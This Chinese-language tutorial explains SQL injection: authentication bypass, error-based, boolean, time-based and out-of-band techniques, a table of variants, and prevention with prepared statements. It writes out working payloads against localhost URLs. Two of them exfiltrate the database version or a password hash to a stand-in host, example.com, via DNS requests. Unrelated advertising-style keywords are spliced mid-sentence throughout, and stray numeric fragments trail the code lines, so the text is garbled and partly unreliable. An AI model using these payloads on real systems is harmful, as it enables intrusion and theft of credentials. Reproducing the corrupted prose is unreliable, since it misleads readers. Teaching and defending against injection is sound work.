什么是 SQL 注入，有哪些类型，如何预防？

SQL注入漏是注入系统漏洞中一种比较严重的漏洞，如果说数据是有类预防系统的核心 ，那么SQL注入就是型何直插系统核心的漏洞。一直以来SQL注入漏洞就被列入OWASP最常见和影响最广泛的注入十大漏洞列表中 。

顾名思义
，有类预防SQL注入漏洞是型何攻击者将恶意内容注入到SQL语句。

为了充分理解这个问题 ，注入我们首先必须了解服务器端脚本语言如何处理SQL查询。有类预防

例如 ：Web应用程序中的云计算型何功能生成了一个带有以下SQL语句的字符串：

复制SELECT * FROM users WHERE username = bob AND password = mysecretpw1.

这个SQL语句被传递给应用程序的一个函数
，该函数将字符串发送到数据库 ，注入之后SQL在数据库中被解析、有类预防执行并返回结果。型何

我们可以看到这个SQL包含了一些特殊字符
 ：

* （星号）是注入SQL数据库返回所选数据库行的所有列的指令。=（等号）是有类预防一条用于使SQL数据库仅返回与搜索到的字符串匹配的值指令。（单引号）用于告诉SQL数据库搜索字符串的型何开始或结束位置。免费模板

在Web应用设计上，往往需要把SQL中的参数设计成可配置的变量 ，例如：在执行用户登录的过程中使用“$user”和“$password”的值进行SQL查询。

复制SELECT * FROM users WHERE username = $user AND password = $password1.2.

这时，如果应用程序如果没有对输入进行处理 ，攻击者可以很容易在语句中插入一些特殊的SQL语法，例如：

复制SELECT * FROM users WHERE username = admin; -- AND password = anything1.2.

其中，admin; --  就是攻击者输入到$user变量的内容，其中包含两个新的高防服务器特殊字符。

分号“;”用于指示SQL解析器当前语句已经结束。

双连字符“--”用于指示SQL解析器该行的其余部分是注释 ，不应该被执行 。

通过这个SQL注入，攻击者有效地删除了密码验证 ，并返回admin用户的数据
。最终导致攻击者可以使用管理员帐户登录，而无需指定密码。

SQL注入漏洞的影响

利用SQL注入
，攻击者可以做很多事情 ，比如：

添加 、源码下载删除、编辑或读取数据库中的内容。从数据库服务器上的文件读取源代码。将文件写入数据库服务器。

除此之外
，甚至可能完全接管数据库和Web服务器
。

常见的SQL注入类型

攻击者可以通过各种方式利用SQL注入漏洞从服务器中窃取数据 。常见的方法包括基于错误、基于条件（真/假）和基于时间等方式来检索数据 。

(1) 基于错误的SQL注入

利用基于错误的SQL注入漏洞 ，服务器租用攻击者可以从可见的数据库错误中检索表名和内容等信息 。

例如：

复制http://localhost:8080/index.php?id=1+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)1.

这个请求会返回一个错误 ：

复制Duplicate entry database1 for key group_key1.

因此，在生产系统上禁用错误消息有助于防止攻击者收集此类信息 。

(2) 基于布尔的SQL注入

当SQL查询失败时，页面上没有可见的错误消息 ，使得攻击者难以从应用程序中获取到信息。但是，仔细观察页面 ，仍然可以判断是可以攻击并提取信息，当SQL查询失败时，有时网页的源码库某些部分会消失、改变或者整个网站无法加载。这些预示着，输入的参数可以用来攻击网站，或者提取数据 。

例如 ：

攻击者可以通过在SQL查询中插入条件来测试：

复制http://localhost:8080/index?id=1+AND+1=11.

如果页面可以正常加载，则可能表明它易受SQL注入攻击。可以肯定的是 ，攻击者通常会尝试使用以下方法来触发错误结果 ：

复制http://localhost:8080/index?id=1+AND+1=21.

由于条件为false ，如果没有返回任何结果或页面无法正常工作（例如，缺少文本或显示白色页面），则可能表明该页面容易受到SQL注入的攻击。

下面是如何以这种方式提取数据的示例：

复制http://localhost:8080/index?id=1+AND+IF(version()+LIKE+5%,true,false)1.

通过这个请求 ，如果数据库版本为5.x，则页面应该会照常加载。但是，如果数据库版本不同，它的结果会有所不同 ，例如显示一个空页面或者一些空白内容，这也表明它是否容易受到SQL注入的攻击。

(3) 基于时间的SQL注入

在某些情况下 ，即使SQL查询对页面的输出没有任何明显的影响，仍然可以从底层数据库中提取信息 。

黑客可以通过数据库的响应等待时间来进一步确定。一般情况下如果页面快速加载 ，那么一般不容易受到攻击；如果加载时间将比平时长，那么它可能比较容易受到攻击。在检测是否有漏洞时，SQL语法可能采用类似基于布尔的SQL注入漏洞中使用的语法。但是可以额外设置一个可测量的睡眠时间 ，IF函数z中的“true” 替换为“sleep(3)，指示数据库睡眠三秒：

复制http://localhost:8080/index?id=1+AND+IF(version()+LIKE+5%,sleep(3),false)1.

如果页面加载的时间比通常要长，则可以判断数据库版本为5.x。

(4) 带外SQL注入漏洞

攻击者从数据库中检索信息的主要方法是使用带外SQL注入技术 。这种类型的攻击通常的做法是将数据直接从数据库服务器发送到由攻击者控制的机器。

例如
：

复制http://localhost:8080/index?id=1+AND+(SELECT+LOAD_FILE(concat(\\\\,(SELECT @@version),example.com\\)))1.

或者

复制http://localhost:8080/index?query=declare @pass nvarchar(100);SELECT @pass=(SELECT TOP 1 password_hash FROM users);exec(xp_fileexist \\ + @pass + .example.com\c$\boot.ini)1.

在这些请求中 ，攻击者通过执行SQL使得数据库向可控的服务器发出DNS请求，这意味着攻击者不需要直接看到注入SQL的执行结果
，而是可以通过可控制的服务器查看到数据库服务器发送的DNS请求。

(5) 其他类型

SQL注入的类型和方式也随着数据库和应用开发技术的发展不断变化 ，除了以上注入类型之外 ，还有许多 ，例如：

分类

描述

基于错误的SQL注入

利用应用程序生成的SQL错误信息推断数据库结构。

联合查询SQL注入

使用UNION操作符将恶意查询与合法查询联合，获取敏感数据 。

盲注（Blind SQL Injection）

数据库错误信息不回显，攻击者通过布尔判断或时间延迟来获取数据 。

基于时间的盲注

利用数据库响应时间的差异来推断数据库信息。

基于布尔的盲注

通过判断应用程序响应的布尔值（真/假）来推断数据 。

内联注入（In-band SQL Injection）

通过应用程序的常规通道（如页面输出）直接获取数据。

堆叠查询SQL注入

在一个SQL查询中执行多个SQL语句 ，用于绕过安全机制并执行恶意操作 。

存储过程SQL注入

通过调用数据库的存储过程执行恶意代码，通常能获得高级权限。

二次注入（Second-order SQL Injection）

恶意代码在第一次注入时未被触发
，而在后续使用时被激活。

基于文件的SQL注入

注入恶意SQL代码以操作数据库中的文件（如读取或写入文件）。

基于HTTP头的SQL注入

攻击者将恶意SQL代码嵌入HTTP头（如User-Agent、Referer），从而注入到SQL查询中
。

基于Cookie的SQL注入

恶意代码通过Cookie字段传递，应用程序未对Cookie进行适当的验证。

多字节字符SQL注入

利用字符集编码漏洞，通过多字节字符构造出未预料的SQL注入 。

XML查询注入（XXE）

攻击者在处理XML输入时注入恶意代码，以操控数据库查询。

日志注入

将恶意SQL代码写入应用程序日志文件 ，进而在日志分析时触发SQL注入 。

API接口SQL注入

针对Web API的输入字段进行SQL注入攻击，通常缺乏详细的错误信息 ，可能更难检测。

第三方插件或模块SQL注入

第三方插件、库或模块中存在SQL注入漏洞 ，影响整个应用程序的安全性 。

组合型SQL注入

结合多种注入方式 ，如基于错误注入与盲注结合，增加攻击成功的可能性
。

跨数据库SQL注入

在多个不同数据库平台之间利用注入漏洞 ，通过一种数据库的弱点入侵其他数据库。

远程代码执行（RCE）

利用SQL注入在数据库服务器上执行任意代码，可能导致系统完全控制。

DNS注入

将SQL注入与DNS查询结合，导致数据外泄 。

如何防止SQL注入

在应用程序服务端，并没有什么好的办法确定SQL查询语句是否被恶意注入 。所能做的就是向数据库服务器发送一个SQL字符串，然后等待数据库解释并返回  。

但是有一个办法就是构建预处理SQL语句，之后执行SQL ，并向其传输变量，这些变量的内容在被执行之前可以被格式化 ，这个有点像printf函数。

例如 ：

构建预处理

复制$stmt = $dbh->prepare("SELECT * FROM users WHERE USERNAME = ? AND PASSWORD = ?");1.

执行 ：；

复制$stmt->execute(array($username, $password));1.

为了预防SQL注入，除了在开发阶段进行规范之外，还可以在一些外部进行预防 ，例如
：

更新中间件和数据库服务器，例如SSH、OpenSSL、Postfix，甚至操作系统本身 。在Web服务器层面别阻止一些不规范的URL。在数据库层面，设置保护数据库的权限。将敏感 、机密数据进行分库隔离存储
。使用入侵检测系统、防火墙等，在攻击Web应用程序之前分析HTTP请求。